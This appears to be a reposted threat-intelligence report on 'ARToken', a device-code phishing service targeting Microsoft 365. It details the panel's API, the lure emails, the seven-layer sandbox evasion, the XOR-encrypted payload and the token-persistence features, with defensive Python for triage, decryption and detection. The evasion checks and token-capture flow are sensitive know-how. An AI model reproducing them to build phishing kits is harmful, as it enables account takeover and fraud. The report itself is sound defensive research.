National Cyber Warfare Foundation (NCWF)

ARToken: Inside an EvilTokens affiliate panel targeting Microsoft 365


2026-07-01 11:53:17
milo
Blue Team (CND)
Talos has identified "ARToken," a phishing-as-a-service platform that targets Microsoft 365. The ARToken panel exposes 80+ API endpoints for device code phishing, Primary Refresh Token persistence, email access, BEC operations, and SharePoint exfiltration.



  • Cisco Talos identified a fully-featured phishing-as-a-service (PhaaS) operator panel, branded "ARToken," that shares infrastructure, API contracts, and operational patterns with the EvilTokens platform documented by Sekoia and Microsoft in early 2026.

  • The ARToken panel exposes 80+ API endpoints for device code phishing, Primary Refresh Token (PRT) persistence, email access, business email compromise (BEC) operations, and SharePoint exfiltration — all accessible to operators through a React-based dashboard.

  • Analysis of the platform's publicly served JavaScript bundle reveals the complete post-compromise toolkit available to affiliates, including capabilities not previously detailed in public reporting on EvilTokens.

  • The phishing kit deploys a seven-layer anti-analysis system combining client-side behavioral verification with XOR-encrypted payloads, a more sophisticated evasion approach than the server-side X-Antibot-Token mechanism documented in prior EvilTokens research.



Background: EvilTokens and device code phishing-as-a-service


In March 2026, Sekoia published a two-part analysis of EvilTokens, a PhaaS platform that abuses Microsoft's OAuth 2.0 Device Authorization Grant (RFC 8628) to capture victim tokens while bypassing multi-factor authentication (MFA) entirely. Microsoft confirmed the campaign's scale in April 2026, noting significantly higher success rates than previous device code attacks, AI-powered personalized lures, and a post-compromise pipeline that included automated device registration for persistent access.

By the time of Microsoft's publication, Sekoia had documented approximately 500 Cloudflare Workers domains and over 1,000 total phishing pages operating under the EvilTokens umbrella, with affiliates targeting finance professionals, HR staff, and logistics personnel across global regions.

EvilTokens' second-stage capabilities, revealed in Sekoia's Part 2 research, include an AI-augmented BEC pipeline chaining Groq-hosted Llama models for financial exposure scoring and GPT-4o-mini for email translation, producing three tailored BEC scenarios per compromised mailbox. The platform sells access at $1,500 one-time plus $500/month, with a standalone "Portal Browser" for $500 lifetime.

The lure in the wild: Vendor-impersonation invoice fraud

Most public reporting on EvilTokens covers the panel and the kit. What it has not shown is how an ARToken lure actually reaches an inbox. Talos recovered two near-identical messages, sent roughly four minutes apart on April 20, 2026, that initiate the chain. The tradecraft is targeted, not spray-and-pray.

Figure 1. A sample ARToken phishing email

The messages spoof an accounts-payable contact at a legitimate Wisconsin contractor, addressed to an accounts-payable recipient at a U.S. life-sciences company — abusing a real vendor relationship rather than inventing a sender. The lure theme is an outstanding-invoice query ("the following invoices appear to still be outstanding… advise when this will be processed"), the kind of message accounts-payable staff are conditioned to act on. Other features of note in this email include:




  • The From header presents the vendor's real domain, but Reply-To quietly redirects replies to an unrelated domain — a classic reply-pivot that keeps any victim response away from the spoofed organization.

  • All three checks fail: SPF, DKIM (body-hash mismatch), and DMARC (compauth=none reason=405). The display identity is not authenticated from the sending path.

  • Each message carries short random hex strings and an inline signature image (pumber.png), consistent with light per-message mutation to frustrate exact-match content rules.

  • The visible anchor text reads as the vendor's genuine SharePoint tenant:
    “https[:]//mononapfp.sharepoint[.]com/:f:/document/INV-IgCx1X50pgUjR7iAjZL2fuQaAW4GfKVs6wHT3BYv9sgwW7g”



However, the actual href points to a near-identical look-alike tenant, the vendor's name with the .com folded directly into the tenant label, under a different, attacker-controlled Microsoft 365 workspace. Because the destination is still a genuine sharepoint.com host, it inherits SharePoint's clean reputation: “https[:]//mononapfpcom.sharepoint[.]com/:f:/g/IgAdH_aaBPMcQbtINZzC1TsLARj3dHj63MnKjvnY-QJrKEc”
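The three header-level tells described above (a Reply-To that leaves the From domain, failing SPF/DKIM/DMARC, and a visible sharepoint.com tenant that differs from the one in the href) can be checked mechanically. The Python below is an added example, not code from the Talos report or from the kit; it runs over a constructed message in which every domain, address, tenant label and link token is a placeholder, and it returns one finding per tell.

```python
import re
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample modelled on the lure described above. Every domain, address,
# tenant label and link token here is a placeholder, not the real one.
SAMPLE_EML = """\
From: "Accounts Payable" <ap@acme-contractor.example>
To: payables@lifesci.example
Reply-To: ap.acme@replies-unrelated.example
Subject: Outstanding invoices
Authentication-Results: spf=fail (sender IP is 203.0.113.10) smtp.mailfrom=acme-contractor.example; dkim=fail (body hash did not verify) header.d=acme-contractor.example; dmarc=none action=none header.from=acme-contractor.example; compauth=none reason=405
Content-Type: text/html; charset="utf-8"

<html><body>
<p>The following invoices appear to still be outstanding. Please advise when this will be processed.</p>
<p><a href="https://acmecontractorcom.sharepoint.com/:f:/g/IgAdH_CONSTRUCTED">https://acmecontractor.sharepoint.com/:f:/document/INV-CONSTRUCTED</a></p>
<img src="cid:sig-9f3a1c.png">
</body></html>
"""

SP_HOST = re.compile(r"^([a-z0-9-]+)\.sharepoint\.com$", re.I)


class _Anchors(HTMLParser):
    """Collect (href, visible text) pairs so anchor text can be compared to the target."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def sharepoint_tenant(url):
    """Tenant label of a *.sharepoint.com URL, or None for anything else."""
    m = SP_HOST.match(urlparse(url).hostname or "")
    return m.group(1).lower() if m else None


def auth_results(msg):
    """Pull spf/dkim/dmarc verdicts and the compauth reason from Authentication-Results."""
    ar = str(msg.get("Authentication-Results", ""))
    out = {}
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", ar)
        out[mech] = m.group(1).lower() if m else "missing"
    m = re.search(r"compauth=(\w+)\s+reason=(\d+)", ar)
    out["compauth"] = f"{m.group(1)}/{m.group(2)}" if m else "missing"
    return out


def triage(raw):
    """Return a list of findings for the lure tells discussed above."""
    msg = message_from_string(raw, policy=policy.default)
    findings = []

    from_dom = msg["From"].addresses[0].domain.lower()
    reply = msg["Reply-To"]
    reply_dom = reply.addresses[0].domain.lower() if reply else from_dom
    if reply_dom != from_dom:
        findings.append(f"reply-pivot: From={from_dom} Reply-To={reply_dom}")

    auth = auth_results(msg)
    failed = [k for k in ("spf", "dkim", "dmarc") if auth[k] != "pass"]
    if failed:
        findings.append("auth-fail: " + ",".join(f"{k}={auth[k]}" for k in failed)
                        + f" compauth={auth['compauth']}")

    html = msg.get_body(preferencelist=("html",))
    parser = _Anchors()
    parser.feed(html.get_content() if html else "")
    for href, text in parser.links:
        shown, real = sharepoint_tenant(text), sharepoint_tenant(href)
        if shown and real and shown != real:
            kind = "lookalike" if real.startswith(shown) else "mismatch"
            findings.append(f"sharepoint-tenant-{kind}: shown={shown} href={real}")
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EML):
        print(f)
```

The look-alike check only fires when both the anchor text and the href are sharepoint.com URLs, which is the specific trick here: a URL reputation lookup on the href passes, so the comparison between what the recipient sees and where the link goes is the signal.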

Discovery: The ARToken Panel

Figure 2. ARToken login page.

During investigation of phishing infrastructure targeting a Talos IR engagement, we identified a management panel at “dashboard-bl.pamconj[.]com” serving a React single-page application (SPA) with a 1.7MB compiled JavaScript bundle. The page title reads "ARToken Panel."

SPA architecture exposes all client-side code including routes, UI labels, component logic, and API endpoint paths in the JavaScript bundle regardless of authentication state. No credentials were required or bypassed.

The associated command-and-control (C2) API operates at “spx.pamconj[.]com”, and phishing lures deploy through Cloudflare Workers accounts including “clear90489058903-document.workers[.]dev”.

Linking ARToken to EvilTokens

The connection between ARToken and EvilTokens rests on multiple overlapping technical indicators:




  • Identical API contract: ARToken's phishing kit issues POST /api/device/start with a JSON body containing userId, clientMode: "broker", login_hint, and redirect_url. The C2 responds with device_code, user_code, verification_uri, and expires_in, exactly matching the EvilTokens API contract documented by Sekoia.



Figure 3. Code request logic.
Figure 4. Code handling logic.



  • Shared clientMode: "broker" semantics: This parameter instructs the backend to use Microsoft's Authentication Broker (WAM) flow for PRT acquisition. It is not a standard OAuth parameter; it is specific to EvilTokens' implementation of persistent token capture.

  • Matching deployment model: Both platforms deploy phishing lures to Cloudflare Workers using UUID-prefixed subdomain patterns. ARToken uses {uuid}-docviewer.workers.dev, {uuid}-onedrive.workers.dev, and {uuid}-adobe2.workers.dev. EvilTokens uses [service]-[random].[target]-s-account.workers.dev. The naming convention and lure themes (Adobe, OneDrive, document viewers) overlap directly.

  • Identical PRT lifecycle: ARToken's API surface includes /prt/setup, /prt/refresh, /prt/renew, /prt/reacquire, and /prt/cookie, the same Primary Refresh Token persistence chain Sekoia documented as EvilTokens' core differentiator over traditional AitM phishing platforms.

  • Shared operational model: Both platforms operate as multi-tenant PhaaS with isolated operator workspaces, Telegram bot notifications on token capture, subscription-based access, and template editors for lure customization.



Technical analysis: The phishing kit

Before the device code payload is enabled, the kit runs a seven-layer client-side anti-analysis gate. Each layer, its mechanism, and its purpose:

  • Layer 1, User-Agent regex: blocks headless browsers, Selenium, Puppeteer, Playwright, crawlers, wget, and curl

  • Layer 2, navigator.webdriver check: detects automation frameworks

  • Layer 3, browser feature fingerprinting: identifies environments missing window.chrome, navigator.vendor, or touch/mouse APIs

  • Layer 4, window dimension analysis: catches headless defaults reporting 0x0 outer dimensions

  • Layer 5, interaction telemetry: requires 3+ mouse moves or 1+ touch events before enabling the payload

  • Layer 6, timing gate: requires a minimum of 800 ms elapsed since page load

  • Layer 7, movement pattern analysis: validates mouse coordinate trajectories for organic (non-linear) motion
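To see what a detonation sandbox has to present before this kit will fetch its device code, here is an added Python model of the seven layers, reconstructed from the table above. It is not the kit's JavaScript (which runs these checks inside the victim's browser); the ClientSignals field names are assumptions about how a sandbox would report browser state, the layer-7 test is one reasonable reading of "non-linear motion", and the three visitor profiles are constructed.

```python
import re
from dataclasses import dataclass, field, replace

# Layer 1: the kind of tokens the kit's User-Agent regex rejects (assumed list,
# built from the table above).
AUTOMATION_UA = re.compile(
    r"headless|phantom|selenium|puppeteer|playwright|webdriver|crawl|spider|bot|wget|curl",
    re.I)


@dataclass
class ClientSignals:
    """What a visiting browser exposes to the gate (assumed field mapping)."""
    user_agent: str
    webdriver: bool                 # navigator.webdriver
    has_window_chrome: bool         # window.chrome present
    vendor: str                     # navigator.vendor
    has_pointer_apis: bool          # touch/mouse event APIs present
    outer_width: int                # window.outerWidth
    outer_height: int               # window.outerHeight
    elapsed_ms: int = 0             # milliseconds since page load
    mouse_path: list = field(default_factory=list)  # (x, y) per mousemove
    touch_events: int = 0


def is_organic(path):
    """Layer 7 model: organic means at least three points that are not all
    collinear; a scripted moveTo/moveBy produces a perfectly straight line."""
    if len(path) < 3:
        return False
    (x0, y0), (x1, y1) = path[0], path[1]
    return any((x1 - x0) * (y - y0) != (y1 - y0) * (x - x0) for x, y in path[2:])


def failed_layers(s):
    """Numbers of the layers this visitor fails; an empty list enables the payload."""
    fails = []
    if AUTOMATION_UA.search(s.user_agent):
        fails.append(1)
    if s.webdriver:
        fails.append(2)
    if not (s.has_window_chrome and s.vendor and s.has_pointer_apis):
        fails.append(3)
    if s.outer_width == 0 or s.outer_height == 0:
        fails.append(4)
    if len(s.mouse_path) < 3 and s.touch_events < 1:
        fails.append(5)
    if s.elapsed_ms < 800:
        fails.append(6)
    # Assumption: trajectory analysis is skipped for touch-only visitors.
    if s.touch_events < 1 and not is_organic(s.mouse_path):
        fails.append(7)
    return fails


def payload_enabled(s):
    return not failed_layers(s)


# Constructed visitor profiles.
HEADLESS_SCANNER = ClientSignals(
    user_agent="Mozilla/5.0 (X11; Linux x86_64) HeadlessChrome/124.0.0.0 Safari/537.36",
    webdriver=True, has_window_chrome=False, vendor="", has_pointer_apis=False,
    outer_width=0, outer_height=0)

HUMAN = ClientSignals(
    user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
    webdriver=False, has_window_chrome=True, vendor="Google Inc.", has_pointer_apis=True,
    outer_width=1920, outer_height=1040, elapsed_ms=1400,
    mouse_path=[(10, 10), (40, 25), (70, 30), (95, 52)])

# Same browser, but the sandbox drove the mouse along a straight line.
SCRIPTED_MOUSE = replace(HUMAN, mouse_path=[(0, 0), (10, 10), (20, 20), (30, 30)])

if __name__ == "__main__":
    for name, profile in [("headless", HEADLESS_SCANNER), ("human", HUMAN),
                          ("scripted", SCRIPTED_MOUSE)]:
        print(name, "fails layers", failed_layers(profile))
```

The practical consequence for URL-scanning pipelines is that a default headless fetch fails every layer and receives nothing worth analysing; a sandbox that drives the page has to present a real browser profile, a non-zero window, a wait of at least 800 ms, and jittered rather than straight-line pointer movement.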


Figure 5. Human verification logic.
Figure 6. Bot detection logic.

This client-side behavioral verification is notably more sophisticated than the server-side X-Antibot-Token mechanism (SHA-256 of secret + timestamp + "antibot", with a 5-minute validity window) documented in Sekoia's EvilTokens research. The divergence is consistent with EvilTokens' known practice of selling anti-bot pages as a separate product through a dedicated Telegram bot. Affiliates may deploy upgraded or custom anti-analysis modules independently of the core platform.

The phishing payload itself fires on DOMContentLoaded and:




  1. Reads any existing JWT from localStorage (key: artoken_jwt) for victim session correlation

  2. Extracts the victim's email from the URL ?hint= parameter

  3. Calls the C2 at /device/start with the hardcoded operator UUID 84eb384d-cd3e-4c90-a283-c960ce557913

  4. Displays the returned device code with a countdown timer (default: 900 seconds)

  5. Directs the victim to “microsoft.com/devicelogin”



The kit includes persistAfterPassChange: false, an explicit signal that the operator understands refresh tokens are revoked on password reset and must exfiltrate data or escalate to PRT before the victim responds.

XOR payload encryption

The JavaScript payload is delivered encrypted with a 16-byte XOR key ([233,69,224,219,53,48,213,165,119,243,77,151,101,148,15,227]) and decrypted at runtime. This differs from EvilTokens' documented AES-GCM Web Crypto API encryption. The decoded sample analyzed here represents the inner payload after decryption, consistent with EvilTokens' delivery model of encrypting phishing content and decrypting client-side to evade static analysis by URL scanners.
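Decrypting such a blob is a one-liner; the useful part is what to pull out of it afterwards, and what to do when the key is not already known. The Python below is an added example, not Talos's tooling or the kit's code. It uses the key published above, encrypts a constructed stand-in for the inner payload (placeholder C2 host and operator UUID, shaped after the five steps listed above) so the example runs offline, shows known-plaintext key recovery for the case where a sample is encrypted under a different repeating key, and extracts the indicators an analyst would want: C2 URL, operator UUID, localStorage key, clientMode and the persistAfterPassChange flag.

```python
import re

# The 16-byte repeating XOR key as published in the analysis above.
XOR_KEY = bytes([233, 69, 224, 219, 53, 48, 213, 165, 119, 243, 77, 151, 101, 148, 15, 227])


def xor_bytes(data: bytes, key: bytes = XOR_KEY) -> bytes:
    """Repeating-key XOR; symmetric, so the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed stand-in for the decrypted inner payload. Only its shape follows the
# behaviour described above (?hint= parameter, /device/start POST, hardcoded
# operator userId, artoken_jwt key). The host and the UUID are placeholders.
INNER_PAYLOAD = """\
document.addEventListener('DOMContentLoaded', async () => {
  const jwt = localStorage.getItem('artoken_jwt');
  const hint = new URLSearchParams(location.search).get('hint');
  const r = await fetch('https://c2.invalid/api/device/start', {
    method: 'POST',
    body: JSON.stringify({userId: '00000000-0000-4000-8000-000000000000',
      clientMode: 'broker', login_hint: hint, redirect_url: location.href}),
  });
  const cfg = {persistAfterPassChange: false, expiresIn: 900};
});
"""

# What a URL scanner actually fetches is the encrypted blob; produce it here so
# the example runs offline.
ENCRYPTED_BLOB = xor_bytes(INNER_PAYLOAD.encode())

UUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}", re.I)
URL_RE = re.compile(r"""https?://[^\s'"`)]+""")
LS_KEY_RE = re.compile(r"""localStorage\.getItem\(['"]([^'"]+)['"]\)""")
MODE_RE = re.compile(r"""clientMode:\s*['"](\w+)['"]""")
PERSIST_RE = re.compile(r"persistAfterPassChange:\s*(true|false)")


def _first(rx, text):
    m = rx.search(text)
    return m.group(1) if m else None


def recover_key(blob: bytes, crib: bytes, key_len: int = 16) -> bytes:
    """Known-plaintext recovery for a repeating key: if the payload is known to
    begin with `crib` and the crib covers one full key period, XOR of the first
    key_len ciphertext bytes with the crib yields the key."""
    if len(crib) < key_len:
        raise ValueError("crib must be at least key_len bytes")
    return bytes(c ^ p for c, p in zip(blob[:key_len], crib[:key_len]))


def extract_iocs(blob: bytes, key: bytes = XOR_KEY) -> dict:
    """Decrypt the blob and pull the indicators an analyst wants from the inner JS."""
    js = xor_bytes(blob, key).decode("utf-8", errors="replace")
    return {
        "urls": sorted(set(URL_RE.findall(js))),
        "uuids": sorted(set(UUID_RE.findall(js))),
        "localstorage_keys": LS_KEY_RE.findall(js),
        "client_mode": _first(MODE_RE, js),
        "persist_after_pass_change": _first(PERSIST_RE, js),
    }


if __name__ == "__main__":
    print("recovered key matches:", recover_key(ENCRYPTED_BLOB, b"document.addEventListener") == XOR_KEY)
    for k, v in extract_iocs(ENCRYPTED_BLOB).items():
        print(f"{k}: {v}")
```

The crib used for recovery is simply the start of the decrypted sample. Because the key repeats every 16 bytes, any 16 known consecutive plaintext bytes at a known offset suffice, so a kit variant that rotates the key per deployment gains nothing against an analyst who has seen one decrypted sample.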

The full operator toolkit

The ARToken panel's API surface reveals the complete post-compromise workflow available to operators:

Token management and persistence

Once a victim completes device code authentication, their captured token appears in the ARToken dashboard. Operators can:




  • Refresh tokens to maintain access

  • Escalate to PRT via the /prt/setup → /prt/refresh → /prt/cookie chain, achieving persistence that survives password resets

  • Export and backup tokens in bulk

  • Import tokens from external sources (enabling cross-platform token trading)

  • Share tokens with other operators via generated links with granular permissions



The UI advertises, "PRT-enabled - Persists across password changes."
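A hunting rule for this chain is to treat device-code sign-ins as suspicious when they come from an address the user has never signed in from, and to escalate when a device registration in that user's name follows shortly after, since registration is the step that yields the PRT the panel advertises. The Python below is an added example, not from the Talos report; the records are constructed, and the field names are assumed to follow the Microsoft Graph signIn and directoryAudit resources, so check them against your own export before relying on them.

```python
from datetime import datetime, timedelta

# Constructed records. Field names follow the Microsoft Graph signIn and
# directoryAudit resources (an assumption: verify against your own export).
SIGNINS = [
    {"createdDateTime": "2026-04-20T13:02:11Z", "userPrincipalName": "ap@lifesci.example",
     "ipAddress": "198.51.100.7", "authenticationProtocol": "none",
     "appDisplayName": "Office 365 Exchange Online"},
    {"createdDateTime": "2026-04-20T14:31:40Z", "userPrincipalName": "ap@lifesci.example",
     "ipAddress": "203.0.113.55", "authenticationProtocol": "deviceCode",
     "appDisplayName": "Microsoft Authentication Broker"},
    {"createdDateTime": "2026-04-19T09:15:00Z", "userPrincipalName": "dev@lifesci.example",
     "ipAddress": "198.51.100.9", "authenticationProtocol": "none",
     "appDisplayName": "Azure Portal"},
    {"createdDateTime": "2026-04-20T09:15:00Z", "userPrincipalName": "dev@lifesci.example",
     "ipAddress": "198.51.100.9", "authenticationProtocol": "deviceCode",
     "appDisplayName": "Azure CLI"},
]
AUDITS = [
    {"activityDateTime": "2026-04-20T14:36:02Z", "activityDisplayName": "Register device",
     "initiatedBy": "ap@lifesci.example"},
]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def hunt_device_code(signins, audits, reg_window=timedelta(hours=1)):
    """One alert per device-code sign-in that is anomalous for its user: the source
    IP has no earlier sign-in from that user in the export, and/or a device was
    registered in the user's name within reg_window afterwards."""
    by_user = {}
    for r in signins:
        by_user.setdefault(r["userPrincipalName"], []).append(r)

    alerts = []
    for user, recs in by_user.items():
        recs = sorted(recs, key=lambda r: _ts(r["createdDateTime"]))
        for r in recs:
            if r["authenticationProtocol"] != "deviceCode":
                continue
            t = _ts(r["createdDateTime"])
            known_ips = {p["ipAddress"] for p in recs if _ts(p["createdDateTime"]) < t}
            reasons = []
            if r["ipAddress"] not in known_ips:
                reasons.append("new-ip")
            if any(a["initiatedBy"] == user
                   and a["activityDisplayName"] == "Register device"
                   and t <= _ts(a["activityDateTime"]) <= t + reg_window
                   for a in audits):
                reasons.append("device-registered-within-window")
            if reasons:
                alerts.append({"user": user, "time": r["createdDateTime"],
                               "ip": r["ipAddress"], "app": r["appDisplayName"],
                               "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in hunt_device_code(SIGNINS, AUDITS):
        print(a)
```

Device code is a legitimate flow for command-line tooling, which is why the rule baselines per user rather than alerting on the protocol alone: the developer's Azure CLI sign-in from a known address produces nothing, while the accounts-payable user's first-ever device-code sign-in from a new address, followed minutes later by a device registration, produces both reasons at once.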

Email operations (ARTSender)

The built-in BEC tool provides:




  • Full Outlook inbox read access per compromised account

  • Email sending as the victim with BCC batch support and configurable inter-send delays

  • Inbox rule creation for forwarding and auto-deletion (evidence suppression)

  • Keyword-based monitoring across all compromised accounts simultaneously

  • Email attachment access and download



SharePoint and OneDrive access

Operators can browse, upload, download, and manage permissions on victim SharePoint sites and OneDrive files, enabling document theft and malicious file placement for lateral phishing.

Infrastructure automation

The panel integrates directly with Cloudflare's API for:




  • Authenticating via API token or Global API key

  • Listing deployed Workers

  • Deploying phishing templates directly to Workers from the panel

  • Managing allowed origins and worker name prefixes

  • Configuring device code proxy servers



Desktop session browser (ARTBrowser)

A standalone Windows application, functionally equivalent to EvilTokens' "Portal Browser," enables operators to browse victim Microsoft 365 sessions using captured tokens outside the web panel. The admin configures a download URL through the settings panel.

Capabilities not previously documented

Several ARToken features extend beyond what Sekoia's research covered:

  • Box Monitor: Cross-account keyword monitoring. Operators define terms and receive matches from all compromised mailboxes

  • Inbox rule manipulation: Programmatic creation of forwarding and hiding rules for evidence suppression

  • Token import: Ingest tokens captured by other tools or purchased externally

  • Shared access links: Collaborative token access between operators with role-based permissions

  • Geo-dynamic templates: Lure placeholders ({city}, {country_code}, {state}) that resolve based on victim geolocation

  • Full SharePoint operations: Site resolution, file upload/download, permission management


These features indicate the platform is more mature than a simple device code phishing kit — it is a complete BEC operations environment.

MITRE ATT&CK techniques

  • Resource Development: Acquire Infrastructure: Web Services (T1583.006)

  • Initial Access: Phishing: Spearphishing Link (T1566.002)

  • Credential Access: Steal Application Access Token (T1528)

  • Persistence: Account Manipulation: Additional Cloud Credentials (T1098.001)

  • Collection: Email Collection: Remote Email Collection (T1114.002)

  • Lateral Movement: Use Alternate Authentication Material: Application Access Token (T1550.001)

  • Defense Evasion: Obfuscated Files or Information (T1027)

  • Defense Evasion: Virtualization/Sandbox Evasion: System Checks (T1497.001)

  • Impact: Account Access Removal (T1531)


Indicators of compromise

The IOCs can also be found in our GitHub repository here.



Source: Cisco Talos
Source Link: https://blog.talosintelligence.com/artoken-inside-an-eviltokens-affiliate-panel-targeting-microsoft-365/





Copyright 2012 through 2026 - National Cyber Warfare Foundation - All rights reserved worldwide.